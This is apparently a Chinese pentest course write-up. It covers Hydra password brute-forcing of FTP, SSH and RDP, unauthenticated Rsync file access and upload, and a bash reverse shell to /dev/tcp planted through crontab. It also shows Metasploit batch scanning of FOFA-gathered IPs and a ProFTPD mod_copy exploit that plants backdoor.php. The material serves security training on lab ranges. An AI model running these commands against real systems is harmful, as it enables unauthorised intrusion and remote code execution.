• 【小迪安全2023】第57天:服务攻防-应用协议&Rsync&SSH&RDP&FTP&漏洞批扫&口令猜解


    1. 🍬 博主介绍
    2. 👨‍🎓 博主介绍:大家好,我是 hacker-routing ,很高兴认识大家~
    3. ✨主攻领域:【渗透领域】【应急响应】 【Java、PHP】 【VulnHub靶场复现】【面试分析】
    4. 🎉点赞➕评论➕收藏 == 养成习惯(一键三连)😋
    5. 🎉欢迎关注💗一起学习👍一起讨论⭐️一起进步📝文末有彩蛋
    6. 🙏作者水平有限,欢迎各位大佬指点,相互学习进步!

    目录

    大纲

    知识点

    1、口令猜解-Hydra-FTP&RDP&SSH

    2、配置不当-未授权访问-Rsync 文件备份

    3、MSF配合fofa进行批量检测

    4、协议漏洞-应用软件-FTP&Proftpd 搭建


    大纲

    知识点

    1、服务攻防-远程控制&文件传输等

    2、远程控制-RDP&RDP&弱口令&漏洞

    3、文件传输-FTP&Rsync&弱口令&漏洞

    1. #章节内容:
    2. 常见服务应用的安全测试:
    3. 1、配置不当-未授权访问
    4. 2、安全机制-特定安全漏洞
    5. 3、安全机制-弱口令爆破攻击
    6. #前置知识:
    7. 应用服务安全测试流程:见图
    8. 1、判断服务开放情况-端口扫描&组合应用等
    9. 2、判断服务类型归属-数据库&文件传输&通讯等
    10. 3、判断服务利用方式-特定漏洞&未授权&弱口令等

    1、口令猜解-Hydra-FTP&RDP&SSH

    Hydra爆破工具:

    GitHub - vanhauser-thc/thc-hydra: hydra

    但是我们平常做渗透测试爆破口令之类的都直接在kali里面使用,kali自带很多工具,下面这个是一个很强大的爆破字典:

    GitHub - TheKingOfDuck/fuzzDicts: Web Pentesting Fuzz 字典,一个就够了。

    1. hydra是一个自动化的爆破工具,暴力破解弱密码,
    2. 是一个支持众多协议的爆破工具,已经集成到KaliLinux中,直接在终端打开即可
    3. -s PORT 可通过这个参数指定非默认端口。
    4. -l LOGIN 指定破解的用户,对特定用户破解。
    5. -L FILE 指定用户名字典。
    6. -p PASS 小写,指定密码破解,少用,一般是采用密码字典。
    7. -P FILE 大写,指定密码字典。
    8. -e ns 可选选项,n:空密码试探,s:使用指定用户和密码试探。
    9. -C FILE 使用冒号分割格式,例如“登录名:密码”来代替-L/-P参数。
    10. -M FILE 指定目标列表文件一行一条。
    11. -o FILE 指定结果输出文件。
    12. -f 在使用-M参数以后,找到第一对登录名或者密码的时候中止破解。
    13. -t TASKS 同时运行的线程数,默认为16
    14. -w TIME 设置最大超时的时间,单位秒,默认是30s。
    15. -v / -V 显示详细过程。
    16. server 目标ip
    17. service 指定服务名,支持的服务和协议:telnet ftp pop3[-ntlm] imap[-ntlm] smb smbnt http-{head|get} http-{get|post}-form http-proxy cisco cisco-enable vnc ldap2 ldap3 mssql mysql oracle-listener postgres nntp socks5 rexec rlogin pcnfs snmp rsh cvs svn icq sapr3 ssh smtp-auth[-ntlm] pcanywhere teamspeak sip vmauthd firebird ncp afp等等。
    18. 例子:
    19. FTP:文件传输协议
    20. RDP:Windows远程桌面协议
    21. SSH:Linux安全外壳协议
    22. ftp爆破:hydra -L test -P 10top1K.txt 47.110.53.159 ftp -V
    23. ssh爆破:hydra -l root -P 10top1K.txt 47.110.53.159 ssh -V
    24. rdp爆破:hydra -l administrator -P 10top1K.txt 47.110.53.159 rdp -V
    25. 字典:fuzzDicts-master项目

    爆破rdp密码:

    利用ftp自动化部署工具,部署一个ftp,利用hydra进行爆破

    ftp爆破最大的特点是账号密码都不确定,账号密码都需要使用字典

    这里由于节省时间,直接告诉他账号,真是环境账号密码都需要利用字典

    2、配置不当-未授权访问-Rsync 文件备份

    rsync 文件传输协议-linux  端口873

    配置不当会造成未授权访问。没有配置ACL或者访问密码,可以读取目标服务器文件

    靶场环境地址:

    Vulfocus 漏洞威胁分析平台

    判断是否有该漏洞的方法:

    1. ┌──(root💀kali)-[~/桌面]
    2. └─# rsync rsync://123.58.224.8:52334

    利用读取文件,拿到flag

    1. ┌──(root💀kali)-[~/桌面]
    2. └─# rsync rsync://123.58.224.8:52334/src
    3. ┌──(root💀kali)-[~/桌面]
    4. └─# rsync rsync://123.58.224.8:52334/src/tmp/ #这里tmp目录后面一定要接/,要不然flag找不到

    上次文件:

    1. ┌──(root💀kali)-[~/桌面]
    2. └─# rsync -av kali.png rsync://123.58.224.8:21419/src/tmp/kali.png
    3. sending incremental file list
    4. kali.png
    5. sent 512,846 bytes received 35 bytes 341,920.67 bytes/sec
    6. total size is 512,626 speedup is 1.00
    7. ┌──(root💀kali)-[~/桌面]
    8. └─# rsync rsync://123.58.224.8:21419/src/tmp/
    9. drwxrwxrwt 4,096 2024/04/23 22:51:30 .
    10. -rw-r--r-- 0 2024/04/23 22:44:18 flag-{bmhad0ff7c7-f192-4388-bba9-1911279ec5a9}
    11. -rwxrw-rw- 512,626 2024/04/19 04:24:19 kali.png

    反弹shell:

    先把/etc/crontab进程任务下载到本地当前目录下

    写个反弹shell:

    1. #!/bin/bash
    2. /bin/bash -i >& /dev/tcp/10.10.10.128/9999 0>&1

    详细步骤如下:

    kali提前进行反弹shell监听,

    由于我这个使用的是在线的靶场环境,所以时间不够,师傅们可以使用本地docker启动环境,具体参考文章如下:

    Vulhub - Docker-Compose file for vulnerability environment

    3、MSF配合fofa进行批量检测

    Fofa_Viewer是一个简单易用的fofa客户端,由 WgpSec狼组安全团队 f1ashine 师傅主要开发。程序使用 JavaFX 编写,便于跨平台使用,相比与web端的方式查询,其启动与搜索速度都有比较明显的提升!接下来介绍一下如何使用吧!

    1. # JDK8 版本
    2. 链接:https://pan.baidu.com/s/1Tq4v04d4Axoun4SYo2JCew
    3. 提取码:lnke
    1. # JDK11 以及更高的 Java 版本
    2. 链接:https://pan.baidu.com/s/1TwjkvCdIYuOn6_TByojkRQ
    3. 提取码:0uob

    输入下面的命令以后,需要我们手动修改如下的配置:

    java -jar fofaviewer.jar
    

    小迪的查询结果:

    配合msfconsole

    我这里随机把小迪的一些IP来测试,保存在ip.list文件中

    然后我们再在kali上打开MSF

    1. msf6 > use auxiliary/scanner/rsync/modules_list
    2. msf6 auxiliary(scanner/rsync/modules_list) > show options
    3. Module options (auxiliary/scanner/rsync/modules_list):
    4. Name Current Setting Required Description
    5. ---- --------------- -------- -----------
    6. RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:'
    7. RPORT 873 yes The target port (TCP)
    8. TEST_AUTHENTICATION true yes Test if the rsync module requires authentication
    9. THREADS 1 yes The number of concurrent threads (max one per host)
    10. msf6 auxiliary(scanner/rsync/modules_list) > set rhosts file:/root/桌面/ip.list
    11. rhosts => file:/root/桌面/ip.list
    12. msf6 auxiliary(scanner/rsync/modules_list) > set threads 10
    13. threads => 10

    run一下,

    [+]号代表有该漏洞

    为了确认是否正确,这里开一台靶机测试,扫描后发现成功发现了。

    4、协议漏洞-应用软件-FTP&Proftpd 搭建

    proftpd 是linux软件启动ftp服务

    ProFTPD是ProFTPD团队的一套开源的FTP服务器软件。该软件具有可配置性强、安全、稳定等特点。

    靶场环境:

    Vulfocus 漏洞威胁分析平台

    访问漏洞地址,是个apache页面

    我们使用官网的exp进行执行命令:

    GitHub - t0kx/exploit-CVE-2015-3306: ProFTPd 1.3.5 - (mod_copy) Remote Command Execution exploit and vulnerable container

    执行下面的命令

    python exploit.py --host 123.58.224.8 --port 42907 --path "/var/www/html/"
    

    然后访问/backdoor.php?cmd=whoami,就可以进行任意命令执行了

  • 相关阅读:
    深度理解 RGMII (包含Linux和realtek)
    AtCoder ABC322G 数学 + 暴力
    1.vue的响应式原理
    J.U.C并发工具【CountDownLatch,Semaphore,CyclicBarrier】底层源码
    API的测试1688平台的封装API接口
    前端开发与后端开发:探索编程世界的两个街区
    面试题-React(十一):性能优化之PureComponent和memo
    程序设计实践学习笔记
    38-SpringMVC
    蓝桥杯2023年-阶乘的和(数学推理,C++)
  • 原文地址:https://blog.csdn.net/SENMINGya/article/details/138162128